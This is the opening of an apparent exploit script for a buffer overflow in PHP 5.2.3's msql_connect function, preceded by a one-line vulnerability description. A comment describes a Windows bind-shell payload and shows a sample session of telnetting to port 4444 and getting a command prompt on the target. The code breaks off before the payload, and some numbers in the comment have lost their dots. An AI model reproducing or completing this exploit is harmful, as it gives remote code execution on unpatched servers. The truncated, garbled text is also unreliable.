Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent malicious users to execute arbitrary code via a long first argument to the msql_connect function.
<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm
GET /scriptphp HTTP/11\n
telnet 192168232 4444
Microsoft Windows XP [Version 512600]
(C) Copyright 1985-2001 Microsoft Corp
C:\apache>
*/
if(!function_exists('msql_connect')) {
die('mSQL extension is not available');
}
$ret ...